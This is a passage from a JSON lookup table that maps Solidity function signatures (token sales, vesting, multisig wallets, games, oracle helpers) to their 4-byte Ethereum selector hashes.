"setRecordContract(address,address)": "0x623406d2", "setSlowDump(uint256)": "0xc655fd2c", "Divium()": "0x02b3b3da", "Lilith()": "0x0e2451c7", "LilithToken(uint256,string,string,uint8)": "0x4da9cb07", "STARTUP()": "0xc1a38768", "MRT()": "0xd019d2c4", "BChain(uint256,string,uint8,string)": "0xe8380983", "change_active(uint256)": "0x243f6e0c", "change_token_price(uint256)": "0xbec60bd2", "DIAMOND()": "0x206545c2", "getManifestId(address,bytes32,uint256)": "0x8e76581e", "getManifestIdsByName(address,bytes32)": "0xa0e4d7d4", "getManifestIdsByRegistrant(address)": "0x42dca9ea", "getLatestManifest(address)": "0x03058aad", "getLatestManifestByName(address,bytes32)": "0x5b225d25", "getManifestById(bytes32)": "0xfa0cdc81", "getManifest(address,bytes32,uint256)": "0xef95aa5d", "register(bytes32,bytes32,string)": "0x0e5ceb47", "nextVersion(address,bytes32)": "0xba7badeb", "setActiveHashType(bytes32,bool)": "0xb73f02e4", "addHashType(bytes32)": "0xfe72277d", "_setStakeHolder(address,uint256)": "0x2eebdeb8", "getPortion(uint256,uint256,address)": "0xa0faf6a1", "getTotalWeight()": "0x06aba0e1", "_setStakeHolder(address)": "0xebe010b8", "setTargetToken(address)": "0x1b66cb00", "getPortion(uint256)": "0xf95afe2c", "countStakeHolders()": "0x2c1d68d4", "isDistributionDue()": "0xa5fba4e1", "isDistributionDue(address)": "0x84869679", "YunJiaMi(address,address,address,uint256,uint256,uint256)": "0x5d40124e", "RoyalTransfer()": "0x0ff88baa", "subBuy(bytes32,bytes32,bytes32,address)": "0x46b55416", "checkRegPeriod(bytes32)": "0xf6ac54dd", "read(string)": "0x616ffe83", "XIDToken()": "0x55d6d06e", "getCurrentPrice(uint16)": "0xaa238110", "hasOwner(uint16)": "0xbc916a50", "getDay(uint16)": "0x49911610", "transferDay(uint16,address)": "0xd98ae811", "changeMessage(uint16,string)": "0x79a0e5be", "changePrice(uint16,uint256)": "0x6349cafa", "buyDay(uint16,uint256,string)": "0x64c2555d", "TPI()": "0x9b5d2e78", "RealMoney()": "0x0be23ace", "TSTEST3()": "0x5991c0dd", "TPortToken()": "0xb5f5d582", "getCircle()": "0x96a49d60", "LastName()": "0xc84c9ef5", "CIFR()": "0xda26f7f6", "AgentContracteGalaxy(address,address,address,uint256,uint256)": "0x4c65c62e", "_finishTheBattle(uint256,uint256,uint256,uint8)": "0x5dec74f8", "theBet(uint256,uint256,uint256)": "0x95621ccd", "ownerOfPiranha(uint256)": "0xbc055227", "piranhasTotalSupply()": "0xf0acfea2", "getTokenUnits(address)": "0x42465a1e", "tokenUnits()": "0x09e91cfb", "creationQuantity()": "0x8c44cb27", "BasketToken(address[],uint256[],uint256)": "0x88849e71", "setETH(string,uint256)": "0xbd345ed9", "removeStaff(string)": "0xdfba9570", "addStaff(string,uint256)": "0x8a4e3025", "BuckySalary()": "0x6fb7110f", "MarkosToken()": "0x422cbb48", "ZeroChain()": "0x7ae79345", "CRF()": "0x8ebed616", "blockchainExchange(uint256,int256,bytes32)": "0x1dce79cf", "MANACrowdsale()": "0xa7ff7a40", "getFundsCollected()": "0xdd1dffb7", "PikewoodFund()": "0x56639ef6", "create(address,uint256,uint256[],uint256)": "0xbcc70902", "tokensOfCaptain(uint32)": "0xee992fd8", "safeTransferByContract(address,address,uint256)": "0xfbeecb47", "LevelUp(uint256,uint32)": "0x17431634", "getCaptainInfo(uint256)": "0x69b7ca85", "getSelled(uint256)": "0xecc4a6c2", "setSelled(uint256,bool)": "0x916f7c23", "setTokenPriceByOwner(uint256,uint256)": "0x380c686d", "_createCaptainToken(address,uint256,uint32,uint32,uint32,uint32,uint32,uint256)": "0xc7fe11d4", "CaptainToken()": "0xf4b28747", "setAdminContract(address,bool)": "0x0865dadc", "add32(uint32,uint32)": "0x59111d83", "sub32(uint32,uint32)": "0x7f7d31dd", "div32(uint32,uint32)": "0x2bcf892c", "mul32(uint32,uint32)": "0x63844a57", "LimorToken()": "0xf58fc2f2", "HOTCASH()": "0x150455a4", "AMLToken()": "0x653853c0", "buyerAddressTransfer(uint256,address,address,address)": "0x764423a4", "getProductWeiRaised(address)": "0xffaf862f", "cf_confirm(uint256,uint256)": "0xe53c9a5f", "TokenTemplate(uint256,string,uint8,string,address)": "0x92cb5f19", "cf_request(uint256,uint256)": "0xe4cecd32", "changeARIWallet(address)": "0xa266c820", "raisedWithdrawal()": "0x5a2e4a11", "vxtestPrivateSale(address,address)": "0xa4e9bcb8", "CEI()": "0x1eb55c51", "depositMoney()": "0x16c05aa2", "addressMoneyBalance()": "0x16937d56", "canHolderTransfer()": "0x86d6c9d1", "contractMoneyBalance()": "0x75b8fa6f", "ProvidenceCasinoToken()": "0x6c10dcdf", "bmi()": "0xcc97edbf", "SpectrumNetworkNetwork()": "0x00f12159", "NVBToken()": "0x26811c09", "changeRates(uint256,uint256)": "0x49231b28", "WCF()": "0x900ddb58", "buyTokensForFiat(address,uint256)": "0x397b8b17", "setPresalePhaseUInt(uint256)": "0x805013c2", "MaptPresaleToken(address,address)": "0xa8a403df", "TestCrowdsale(uint256,uint256,uint256,address,uint256,uint256)": "0x71f0ad64", "calculatePrice(uint256,uint256,uint256)": "0xe015c62a", "createPricing()": "0xa1315b7e", "MaptPricing()": "0xf70ccc6e", "GENTATOKEN()": "0x9cd43690", "ZEUSCoin()": "0x28fce8c8", "XITC()": "0xafe9c776", "demo1(address,uint256,bytes,string)": "0xe72c81cf", "YaoDun()": "0x6e5deca4", "IkokoToken()": "0x23355749", "buyerAddressTransfer(address,address,address)": "0x96f42876", "getPurchaseDetail(uint256,uint256,address)": "0xdb447c04", "chargeChannel(uint256)": "0xa5fd0a18", "checkSignatures(bytes,bytes,bytes,address)": "0x45e8baa7", "getVerifiedReceipt(bytes,bytes,bytes)": "0xebfd288a", "userChannelsCount(address)": "0x6fd5036d", "withdrawAllChannels(address)": "0xedecde0e", "withdrawChannel(address,uint256)": "0x264ae918", "challengeChannel(bytes,bytes,bytes)": "0xb78aa7f4", "closeChannelWithoutReceipt()": "0x24b4fc8e", "closeChannel(bytes,bytes,bytes)": "0xe535ed35", "parseResultCompatible(bytes)": "0xa4a691ce", "parseTradeCompatible(bytes)": "0xb41283bc", "parseChannelCompatible(bytes)": "0x44710181", "MamaBearToken()": "0xc19d7808", "acceptBlokTokenOwnership()": "0x999377ec", "requestBlokTokenOwnershipTransfer(address)": "0x29dd0d7d", "BlokTokenSale(address,uint256)": "0x163935a8", "HOPE()": "0x74ac6112", "WGWToken()": "0xab89d8c6", "ZUE()": "0x717cb858", "REBELCOIN()": "0x50d925fb", "SyloToken()": "0xc2cdbf01", "vaultFunds()": "0x3aa51e41", "setup(uint256,uint256,address)": "0x080fbebf", "ProofOfStableClone()": "0xd3437bd3", "addManyToWhitelist(address[],uint16,uint256)": "0x574cc0fe", "addToWhitelist(address,uint16,uint256)": "0xd305399d", "approveAndCall(bytes,address,address,address,uint256,uint256,uint256,uint256,bytes)": "0xf03e786a", "burnSignature(bytes,address,address,address,uint256,uint256,uint256,uint256,bytes)": "0xc272f73e", "tokenApprovalWithSignature(address,address,address,uint256,uint256,uint256,bytes32,bytes)": "0xe80f23aa", "getLavaTypedDataHash(bytes,address,address,address,uint256,uint256,uint256,uint256)": "0x55f25e3f", "CryptoGOToken()": "0x2a03ffa5", "MosaiCoinContract()": "0x227fb30b", "WXSLToken(uint256,string,string)": "0x1c8685e0", "isIcoTrue()": "0x3fd0f727", "calculateTokensWithBonus(uint256)": "0x9b3a36c0", "calculateTokensWithoutBonus(uint256)": "0x3cd2df82", "getTimeBasedBonus(uint256)": "0x60cd4ba4", "getCurrentPhase(uint256)": "0x572e85ec", "icoSucceed()": "0xf27a4188", "TokenRHT()": "0x8cbb13e7", "transferMultiple(address[],uint256[],uint256)": "0xa201ed8b", "changeFundsWallet(address)": "0x7d6f0d5f", "CPSTestToken1()": "0xa5bf7aae", "lockedSupply()": "0xca5c7b91", "MCIM()": "0x7a48b408", "ByteLocker()": "0xc557d29c", "getAllBaller()": "0xe26659da", "getSellBallers()": "0x9dd7b3c3", "getTeamBallers(address)": "0x746df633", "buyStar(uint256,uint256)": "0xf62eded9", "CardFootballers()": "0x64584d16", "createFootballerStar(uint256,uint256,uint256,uint256)": "0xce2dfd00", "_randMod(uint256,uint256)": "0xae7fc1da", "createFootballer()": "0xd9b7d41b", "_createFootballerStar(uint256,uint256,uint256,uint256)": "0xf2269c8e", "FootballerAccessControl()": "0x08de68cc", "eForecastGambleToken()": "0x93a69ae0", "_airdrop(address)": "0x6e21fc87", "BabyCoin(uint256,string,string)": "0x5e38ab4c", "currentTransferableTokens(address)": "0x44c11fe4", "DOSTToken()": "0x703fa81c", "lastTokenIsTransferableNumber(address)": "0xa0eaa5dd", "calculateVestedTokens(bool,uint256,uint256,uint256,uint256,uint256,uint256)": "0x7bf26182", "calculateVestedTokensNumber(uint256,uint256,uint256,uint256,uint256)": "0xefe0e495", "calculateVestedTokensTime(uint256,uint256,uint256,uint256,uint256)": "0x4a8a83db", "grantVestedTokens(address,uint256,uint256,uint256,uint256,bool,bool,bool)": "0xc721b6bd", "transferableTokens(address,uint256,uint256)": "0x382c52cd", "buyPuzzle(uint8)": "0x25400abc", "changePuzzle(uint8,uint8,uint8,uint8,uint8)": "0xe7b43c44", "getPuzzle(uint8)": "0xd4269986", "initNewGame()": "0x8f728516", "PayWins(address)": "0xd883e789", "Payments()": "0x164ba24b", "dropCoins(address[],uint256)": "0x169ea2f8", "COVERCOINToken(string,string,uint8,uint256)": "0x0b57c487", "AST()": "0xd97095f3", "SpursvsWarriors419()": "0xa80da0f1", "dollaryDanToken()": "0xf2091083", "checkFeePeriodRollover()": "0xc014464e", "rolloverFeePeriod()": "0x5142ba74", "recomputeAccountLastAverageBalance(address)": "0x595a4fc2", "recomputeLastAverageBalance()": "0x1127be97", "_recomputeAccountLastAverageBalance(address)": "0xee22adf8", "rolloverFee(address,uint256,uint256)": "0x46eeed5f", "adjustFeeEntitlement(address,uint256)": "0x2b3a4ae3", "withdrawFeeEntitlement()": "0x9a0b2db3", "emitTransferEvents(address,address[],uint256[])": "0x753c619c", "endow(address,uint256)": "0xef3bec3d", "setTargetFeePeriodDuration(uint256)": "0xf8688ddd", "terminateSelfDestruct()": "0x3278c960", "initiateSelfDestruct()": "0xbd32aa44", "SelfDestructible(address,address)": "0xbc17bd7e", "addVestingSchedule(address,uint256[],uint256[])": "0xbb2a7d0c", "appendVestingEntry(address,uint256,uint256)": "0x1bb47b44", "purgeAccount(address)": "0x135c0701", "withdrawHavvens(uint256)": "0x19dc831a", "getNextVestingQuantity(address)": "0x97f46527", "getNextVestingTime(address)": "0x6b3905c4", "getNextVestingEntry(address)": "0x2f5bb661", "getNextVestingIndex(address)": "0x19e740c0", "getVestingQuantity(address,uint256)": "0xee1d036c", "getVestingTime(address,uint256)": "0x9b217f90", "getVestingScheduleEntry(address,uint256)": "0xda7bd3e9", "numVestingEntries(address)": "0x204b676a", "confiscateBalance(address)": "0xdd1bb3d1", "terminateLiquidation()": "0xdca92eb5", "extendLiquidationPeriod(uint256)": "0xa3d658dc", "beginLiquidation()": "0xd44dd681", "forceLiquidation()": "0x9a819e5e", "diminishPool(uint256)": "0x820267ff", "replenishPool(uint256)": "0x787ccb61", "canSelfDestruct()": "0x2f3e9bc5", "TretanToken()": "0x59bb6b5f", "PooShitToken()": "0x9ae082a4", "countShips(uint16,uint16,uint8,bytes32)": "0x7a6b456f", "storeShip(uint16,uint16,uint8,uint256,bytes32)": "0x3ac8b026", "setPrice(uint16,uint16,uint8,bytes32,uint256)": "0xe35e6e0c", "buyShip(uint16,uint16,uint8,bytes32)": "0x5565ca9d", "sellShip(uint256,bytes32)": "0x0de9b825", "_buildShip(uint16,uint16,uint8,bytes32)": "0x0d40022a", "buildShip(uint16,uint16,uint8,bytes32)": "0x38a57d0c", "_build(address,uint256,bytes)": "0xebb11c93", "BigBucksToken()": "0xd86f26f2", "toldYouSo(bytes32)": "0x126c13c8", "markMyWord(bytes32,uint32)": "0x40848af5", "HashLotto()": "0x3c56d236", "addContract(string,address)": "0xbf5b6016", "DevsmartCoinFive()": "0xad4f0e3a", "ZeroReturnProfit()": "0xe3ffefe3", "lockBountyTokens(uint256,address,uint256)": "0x56d40468", "FxxkToken()": "0xd8b79543", "flip()": "0xcde4efa9", "flip(bool)": "0x1d263f67", "DevsmartCoinFour()": "0x042c71f5", "translateToStartingTile(uint16)": "0xa61ef635", "translateTileToWidth(uint16)": "0x60bebe98", "findTile(uint16,uint16,uint16)": "0xa1029aff", "getTotalWidth(uint16,uint16)": "0xe7c8d171", "getTile(uint16,uint16,uint8)": "0x8435da61", "transferTile(uint16,uint16,uint8,address)": "0x490fdbd7", "setTileContract(uint16,uint16,uint8,address)": "0xf53c5c87", "setPrice(uint16,uint16,uint8,uint256)": "0x45f6ee41", "setPriceAt(uint16,uint16,uint8,uint256)": "0x1ccc7013", "setOwnerAt(uint16,uint16,uint8,address)": "0xe81c17a1", "setContractAt(uint16,uint16,uint8,address,address)": "0xef0dbcbb", "setTileTypeAt(uint16,uint16,uint8,uint16)": "0x3fa54ed8", "buildTile(uint16,uint16,uint8,uint16)": "0xc71cb0b4", "buyTile(uint16,uint16,uint8)": "0xfcbeaaa7", "editTile(uint16,uint16,uint8,uint16,address)": "0x2cab6c6a", "generateLand()": "0x72ea7243", "Land(address)": "0xf90cf0a4", "setMainLocation(uint16,uint16)": "0xabfe0472", "Test(uint256,uint256)": "0x91916a5e", "ZhkCoin(uint256,string,uint8,string)": "0x356ca551", "BoSenCoin_Test(uint256,string,uint8,string)": "0xf617a0e9", "MySecondToken()": "0xf25ee28d", "createGuess(uint256,uint256,uint256,uint256)": "0x26f743d0", "PrediksiToken()": "0x10b8b441", "convert(string)": "0x962a64cd", "ENDRoot()": "0xd1295eca", "Fxxk2Token()": "0xcd45fcdb", "ctyCoin()": "0x5d5c3011", "StreamXOnline()": "0x1076c2d7", "sendApprovedTokensToInvestor(address,uint256)": "0x3715ae53", "doAirdrop(address[],uint256)": "0x4587327a", "DistributeXcel(address)": "0x8da46db4", "biddedico()": "0x069a6947", "isTimeOver()": "0x6defe0b9", "getSafeAddr()": "0xa67d2602", "getMainLockup()": "0xe23a4916", "getMainBalance()": "0xa22dff2c", "getInfoCellLockup()": "0x19eaeccb", "getInfoCellBalance()": "0x88e490eb", "transferCell(address,uint256)": "0x025e8095", "withdrawCell(uint256)": "0x55b9ca40", "setTimeOutAuthentication(uint256)": "0x6df03165", "changeKey(address,address)": "0x68b49b78", "changeDepositCell(address,uint256)": "0x0b1ba852", "depositCell(address,uint256)": "0xb5c3a111", "editCell(address,uint256)": "0xed45747f", "deleteCell(address)": "0x78918e89", "setCell(address,uint256)": "0x932838a1", "AssetWithdraw(address,uint256)": "0x99304cd4", "getSafeKey(uint256)": "0x53ce910e", "getCountOfCell()": "0x0b509e1d", "getExistCell(address)": "0x8dfb04fe", "getBalanceCell(address)": "0x14cf6983", "getLockupCell(address)": "0x16f33fc2", "getFreeAmount()": "0x14941e80", "getTimeOutAuthentication()": "0xbc428ee2", "AuthEnd()": "0x7791dc1f", "AuthStart()": "0x19921ad2", "getContracts(address)": "0x213fe2b7", "createLastWill(address,string,string,string)": "0x64d05519", "BackToLife()": "0x3112fb6e", "EdCoinToken()": "0xba838b01", "Watsondog()": "0x5412af17", "MultiAirDropToken(uint256,string,uint8,string)": "0xeef22a79", "allocateAdvisorTokens(address[],uint256[])": "0x8de69f66", "airdropTokens(address[],uint256)": "0xa11223da", "doInitialDistribution(address,address,address)": "0x8e2e0776", "allocateEqual(address[],uint256)": "0xfefd6e9a", "allocate(address[],uint256[])": "0xbdad4dc3", "ENDHarvest()": "0x4de9e482", "ExchangeLinkToken()": "0x290d256e", "devTokensToken()": "0x00a09a7a", "CatToken()": "0x3d4af864", "signFact(bytes16)": "0x83b2d77f", "isSigned(bytes16,address)": "0xfec7fc8e", "postFact(bytes16,address,string)": "0xaa3ef248", "getFact(bytes16)": "0x020331dd", "BitRecord()": "0x026189ec", "AgencyLock2()": "0x53ea04fe", "mintableAddress()": "0xdf4c2164", "cap_ACE()": "0x3cfe25cf", "getGTOAddress()": "0x870f892d", "dev_share()": "0x739f9202", "getTransactionPrice()": "0x6a0c8730", "setContinueSelling()": "0xcef037fd", "deactivateTime()": "0x3fb3bec2", "AREF()": "0x5602c05f", "AVAILABLE_COMPANY_SUPPLY()": "0x37292eeb", "MYINITIALSUPPLY()": "0x11420f90", "APPROVE_CONTRACT()": "0x7064aa96", "initialToken()": "0x3ea97009", "AGENCY_TOKEN_CAP()": "0x1acc57b8", "tokenSaleOnHold()": "0x46b249b9", "millWeiRate()": "0x4cf5b6c7", "allowedToPurchase()": "0x48e4e297", "startPeTime()": "0x24884fc2", "silo_timer()": "0x004ebaa8", "platformFee()": "0x26232a2e", "minimumTDEContributionInWei()": "0xd903c5ae", "anyRequestAvailable()": "0x6ca78a1c", "operationToken()": "0xde8c85ea", "icoSalesSupply()": "0x4d986c8f", "currentPeriodTokenCollected()": "0xd3a85394", "hostAccount()": "0x9c7dcdeb", "fpct_packet_size()": "0xd4a4513e", "mainCapInWei()": "0x5c9d4528", "deploymentBlock()": "0x82100e3f", "minFundingGoalWei()": "0x888b6557", "getSystemInfo()": "0x6cb69f42", "processingFee()": "0xde1881a8", "recalcFlags()": "0x53c3a57d", "guardian1()": "0x603d1b98", "AIRDROP_TOKENS()": "0xa0eb5dd1", "foundersAmount()": "0xea5c3204", "firstXRChangeBlock()": "0x5c04e9f8", "presold()": "0x5d69d600", "MAX_FUNDING_SUPPLY()": "0x43525d73", "timeOfLastProof()": "0x81c8149d", "etherToken()": "0xb8066bcb", "tokenSaleEndTime()": "0xb12a8229", "airdropAmount()": "0xfc2ea8a5", "ethAvailable()": "0x4ce56c5d", "ETHReceived()": "0x58275869", "finalizedCrowdfunding()": "0x68f67330", "firstTokenCap()": "0xa14e88fe", "lastCitizenPaid()": "0xd94395e2", "tokenSupplyFromCheck()": "0xc9a6e480", "ticketTransfersAmount()": "0x28f0d47b", "ETH_CAP()": "0x9d837ccd", "unchainedMultisigVersionMinor()": "0xa7dd7a59", "firstblock()": "0xe85365d5", "MyTotalWithdrew()": "0x624a8bc3", "totalInterestCycles()": "0x7d65e3fe", "tokensFromPresale()": "0x93d865e3", "contractInitialized()": "0x00b34747", "start_of_report_period()": "0x9634ef56", "site_url()": "0x2326df93", "alternative_Exchanges_links()": "0x367cad89", "saleConversionRate()": "0x52e3d369", "t_Michail2()": "0xa1347622", "SALE_START_DATE()": "0x547c1b6a", "POOH_TO_CALL_1PLUMBER()": "0x6ab8bd2b", "hasSoldOut()": "0x03824f76", "marketingTokenAmount()": "0x71afc713", "m_SMRMinter()": "0x984a27be", "developmentFundUnlockTime()": "0x32443d7d", "minDeposit()": "0x41b3d185", "lrcInitialBalance()": "0x8e535ade", "creatorInited()": "0xad7f401b", "divCut()": "0x5ecd62b9", "total_money_back()": "0x62ef7738", "currentTreasure()": "0x80c2fb7d", "transferLockup()": "0xc24fe21b", "checkGlobalBalance()": "0x9ef974bb", "PAYOUT_ATTEMPT_INTERVAL()": "0x520c7d6f", "getCurrentAvailableFunds()": "0x8fd65890", "megaCandy()": "0xa891af67", "CREATED_STAR5()": "0xde576c8a", "marketingTokensWallet()": "0xaa5b7df8", "getProposalLength()": "0x8263a938", "secondRoundICODiscount()": "0x2d3fb721", "AdvisorsPartnersAmount()": "0x33b186c1", "currentEthInvested()": "0x1b1686b6", "recipientContainer()": "0x55c81ae9", "getApplicationAddress()": "0x70d8915a", "confirmAllBuys()": "0xb47f817e", "getMaxNumberOfTokens()": "0x944b7c3f", "ico_start()": "0x7a013105", "Show_the_name_of_Option_B()": "0x5756572e", "redistributionTimeout()": "0xb54eb822", "superman()": "0xeabd5dd6", "minEsteemAmount()": "0x6f1003c4", "distributeOwnership()": "0x0102fcfc", "lastBlock_v18Hash_uint256()": "0xb33a2ea0", "calcBonusPercent()": "0xaa03214c", "isEcoAllocated6()": "0xf1ed9923", "availableICO_w1()": "0xdd72ae4e", "foundationSupply()": "0x82e6d3d6", "destroyCar()": "0xb3610f37", "driveCar()": "0xd4508698", "getOutCar(uint256)": "0x9e8a41f4", "getInCar()": "0x8bd82b20", "setPrivilegeState(bool)": "0x90b67185", "getEthBullet()": "0x3d436ea1", "getPrivilegeState()": "0x18d4e834", "getCarState()": "0x78dda193", "latinotoken(uint256,string,uint8,string)": "0x802daa62", "RemoveUser(address,address)": "0xdc4c4005", "DeleteUser(address,address)": "0x8232e09e", "FundTransfer(address,address,address,uint256)": "0x8dae5adc", "MDICOStage2(address,address,uint256,uint256,uint256,uint256)": "0x4abd89bd", "FundWithdrawl(address,address,uint256)": "0xfdc487a7", "FundDeposit(address,address)": "0x857cd569", "getuserbalance(address,address)": "0xcb1b82b7", "getAddusers()": "0xdd217ce1", "setAddUsers(address,address,string,string,uint256)": "0xdbbf01b2", "FMT_Crowdsale()": "0x44558192", "getLimit()": "0xb295a00e", "findWinner()": "0x8e71decb", "random(uint256,uint8)": "0xfb072d2a", "socoreCheck()": "0x63b45bd9", "correct_check_match(uint256[39])": "0x2a6e3e5e", "playSlot()": "0xfca5d21f", "flipCoin()": "0x799ae223", "bat_match(uint256[])": "0x92fd1c2d", "Tccchain(uint256,string,string)": "0x2ca26866", "senderAdminAndSaleNotFinal()": "0xe39cbe80", "onlyStores()": "0xbf4f7cc0", "emitAndStore()": "0x6cd6043a", "onlyAdminAndNotInit()": "0x7f88616f", "FantomToken()": "0x0ed7c905", "destPrecision(address)": "0x67dd1730", "destPercent(address)": "0x2008c2ca", "destTokens(address)": "0x6c343afc", "destIndex(address)": "0xc0997654", "reservedDestinations()": "0x34c8e114", "tokensUnlocked()": "0x906802cf", "finalizeAndDistributeToken()": "0x18d0eb93", "distributeAndUnlockTokens()": "0x2583373c", "finalizeCrowdsaleAndToken()": "0x545305fb", "removeReservedTokens(address)": "0x726a3ad1", "updateMultipleReservedTokens(address[],uint256[],uint256[],uint256[])": "0xced80aca", "setTransferAgentStatus(address,bool)": "0x4a68492c", "initCrowdsaleToken(bytes32,bytes32,uint256)": "0x24baeb12", "TOKEN_INIT(bytes32,bytes32,bytes32)": "0x817472c0", "initCapsule(uint256)": "0xb7f9c4f6", "FINALIZE(bytes32)": "0xec65b7a0", "EthereumPinkToken()": "0xf956a1b5", "AGENT_STATUS(bytes32,address)": "0xc7e0635d", "ChargingGas(uint256)": "0x1ba83c3c", "RequiringAuthorization()": "0x18760eb3", "drip()": "0x9f678cca", "Mortal(address)": "0x26ea66bf", "CTOC()": "0x400aaab7", "MMOTOKEN()": "0xd9a19a7a", "NECPToken()": "0x32dbc7d4", "RonaldoChain()": "0x381abeb5", "checkReturn()": "0xd9c3d3c9", "exec(bytes32,bytes)": "0x7fab541c", "getWhitelistStatus(uint256,address)": "0x38c80fc3", "getTierStartAndEndDates(uint256)": "0x9ee398ce", "getCrowdsaleTier(uint256)": "0xb3562e6e", "toStr(bytes32)": "0x1dcd0305", "exec(address,bytes32,bytes)": "0xb8416d2e", "createRegistry(address,address)": "0x031d7421", "createInstance(address,bytes32,address,bytes32,bytes)": "0x6ee7a063", "getTarget(bytes32,bytes4)": "0xfa34da5e", "getCrowdsaleTierList()": "0x46d89444", "YELLQASH()": "0x48f69212", "getCrowdsaleMaxRaise()": "0x18b3a119", "getCurrentTierInfo()": "0xf576f722", "getCrowdsaleStartAndEndTimes()": "0x4bc091a3", "WEECoin()": "0x394da86b", "getCrowdsaleInfo()": "0x2d37e6dc", "multWee(uint256,uint256)": "0x39b57835", "MarnieCoin()": "0x1e552efc", "subtractWee(uint256,uint256)": "0x7572f341", "Flabba()": "0x31ad836e", "ProfileOwner()": "0xdf8f7971", "record(string,string,string,address,bool,string,string,string)": "0x50d7bf09", "changeReceiverAddress(address)": "0x8f5fa4a4", "toggleDeposit(bool)": "0xed6bfa2b", "receiveDeposit(uint256,uint256)": "0xa389ef53", "VillanovavsRadford()": "0x3df5958f", "userLookup(uint256)": "0xc8c9d745", "setNav(uint256)": "0x251d8ffb", "setTokenTwdt(address)": "0x85ec419a", "setTokenGbi(address)": "0xfbb11f29", "abort(string)": "0x35acac4e", "sell(uint8,string,uint256,uint256,uint32)": "0xff4d7404", "Purchase(address,address)": "0x895ee30d", "emergencyTransfer(address)": "0x0e501834", "setAdminMode(bool)": "0x12582c1a", "AUTBToken()": "0xa0775baf", "aqwsaqws()": "0x8300399d", "SiniCoin(string,uint256,uint8,string)": "0x699dde66", "updateFieldss(uint256,uint8,uint256)": "0x841efac4", "addONG(bytes32,string,string)": "0x6efbb60a", "query2(string,string,string)": "0xe839e65e", "query1(string,string)": "0x45362978", "query(string,string)": "0x81ade307", "setBasePrice(uint256,bytes)": "0x7d242ae5", "setBasePrice(uint256)": "0xde4b3262", "getPrice(string,uint256,address)": "0x8579cbde", "setGasPrice(uint256)": "0xbf1fe420", "getPrice(string,address)": "0xa8239d0b", "createCoupon(string)": "0x62b3b833", "addDSource(string,uint256)": "0xa2ec191a", "Oraclize()": "0x0e1ca8a5", "setAddr(address)": "0xd1d80fdf", "OraclizeAddrResolver()": "0x9a1b420b", "fillOrderAuto()": "0x39f4debc", "fillTheirOrder(address)": "0xfcc6b5d5", "fillMyOrder(uint256)": "0xd9feeeb6", "_fillOrder(address,uint256)": "0x370ec1c5", "numTokensAbleToPurchase()": "0x8f367001", "getTransferableBalance(address)": "0x4c0bcfe5", "Order(address,uint256,uint256)": "0xe854dfb4", "kill(address)": "0xcbf0b0c0", "Wallet(address[],uint256,uint256)": "0xc4ff3614", "confirm(bytes)": "0xf2ddc772", "execute(address,uint256,bytes)": "0xb61d27f6", "today()": "0xb74e452b", "underLimit(uint256)": "0x180aadb7", "resetSpentToday()": "0x5c52c2f5", "setDailyLimit(uint256)": "0xb20d30a9", "daylimit(uint256)": "0xae99847b", "clearPending()": "0x5f6a1301", "reorganizeOwners()": "0xc1812b15", "confirmAndCheck(bytes)": "0xe88b8ac6", "hasConfirmed(bytes,address)": "0x3b49a77b", "isOwner(address)": "0x2f54bf6e", "changeRequirement(uint256)": "0xba51a6df", "removeOwner(address)": "0x173825d9", "addOwner(address)": "0x7065cb48", "changeOwner(address,address)": "0xf00d4b5d", "revoke(bytes)": "0x0b467b9b", "multiowned(address[],uint256)": "0xdc75f2db", "getDesignatedCaller(address,uint256)": "0x5a8dd79f", "getGenerationIdForCall(address)": "0x04dd69fa", "isInGeneration(uint256)": "0xa6c01cfd", "getGenerationSize(uint256)": "0xb3559460", "getGenerationForCall(address)": "0x345006b6", "RemovedFromGeneration(address,uint256)": "0xf1173928", "AddedToGeneration(address,uint256)": "0x6a704d7b", "execute(uint256,address)": "0xc032dc30", "cancel(address)": "0x4c33fe94", "getCallFeeScalar(uint256,uint256)": "0xda0774ad", "confirmReceived()": "0x73fac6f0", "confirmPurchase()": "0xd6960697", "abort()": "0x35a063b4", "Purchase()": "0x49c15bd9", "rescind()": "0xf3b50c04", "execute(uint256)": "0xfe0d94c1", "request(uint256)": "0xd845a4b3", "getWithdrawal(uint256)": "0x8a4fb16a", "ColdWallet(address,address)": "0x92e9fd5e", "payout(address)": "0x0b7e9c44", "Bounty(address,address)": "0xeb95b7d5", "setMembershipRoster(address)": "0x85654c9c", "all()": "0x10c4e8b0", "checkMembership(address)": "0x5fb64fd6", "set_factory(address)": "0xee2af3fb", "removeMember(address)": "0x0b1ca49a", "BountyList()": "0x76d690bb", "MembershipRoster()": "0xa1e4d3c2", "create(uint256)": "0x780900dc", "kill()": "0x41c0e1b5", "digest(bytes,uint256)": "0x15e33901", "shiftBitsRight(bytes,uint256)": "0xff27c476", "shiftBitsLeft(bytes,uint256)": "0x5e07f240", "shiftBits(bytes,int256)": "0xc02f081a", "rotateBitsRight(bytes,uint256)": "0x109df68e", "rotateBitsLeft(bytes,uint256)": "0x6506b623", "rotateBits(bytes,int256)": "0x69307c80", "iterateOverThings()": "0xe51ff1fc", "addThing(bytes)": "0xb7e24979", "remove(bytes,bytes)": "0x69573648", "exists(bytes,bytes)": "0xb7bae9b7", "query(bytes,bytes,int256)": "0xbea124a6", "insert(bytes,bytes,int256)": "0x3943807b", "getPreviousNode(bytes)": "0x1b370abb", "getNextNode(bytes)": "0xb0aab296", "getNodeRightChild(bytes)": "0x4296a9cb", "getNodeLeftChild(bytes)": "0xc1b056b0", "getNodeParent(bytes)": "0x3517a740", "getNodeHeight(bytes)": "0x662dbe96", "getNodeValue(bytes)": "0x5ca1c5a0", "getNodeIndexId(bytes)": "0xaa272d4b", "getNodeId(bytes)": "0xf64fca2e", "getIndexRoot(bytes)": "0x337c1e28", "getIndexName(bytes)": "0x0c5c2ca3", "getNodeId(bytes,bytes)": "0x8963dab4", "getIndexId(address,bytes)": "0xdf25ee23", "bet(uint256)": "0x7365870b", "get_all_names()": "0x309424fe", "get_all_levels()": "0xc985c221", "add_level(address,bytes)": "0xb651cbaf", "getDigitFromByte32(bytes32,uint8)": "0xaef983d0", "getUint8FromByte32(int8,bytes32,uint8)": "0x597ea5cc", "getByteFromByte32(bytes32,uint8)": "0xc4a96758", "getByteFromByte8(bytes8,uint8)": "0x180a351b", "ByteExtractor()": "0x4f27de64", "refundBuyer()": "0xe8a61cc8", "Transaction()": "0x55138534", "addAgent(uint256,uint256,uint256,address)": "0xe267dd9b", "getAgent(uint256)": "0x2de5aaf7", "getAgentsWithService(uint256)": "0xfe95cbdd", "bookCab(uint256)": "0xb74ffca7", "computeFare(uint16)": "0xf0032567", "CarFare(uint16,uint16)": "0xfee160be", "finaliseState()": "0x64812751", "lastSender()": "0x256fec88", "TicTacToe(address,address,uint256)": "0x8cf39a9c", 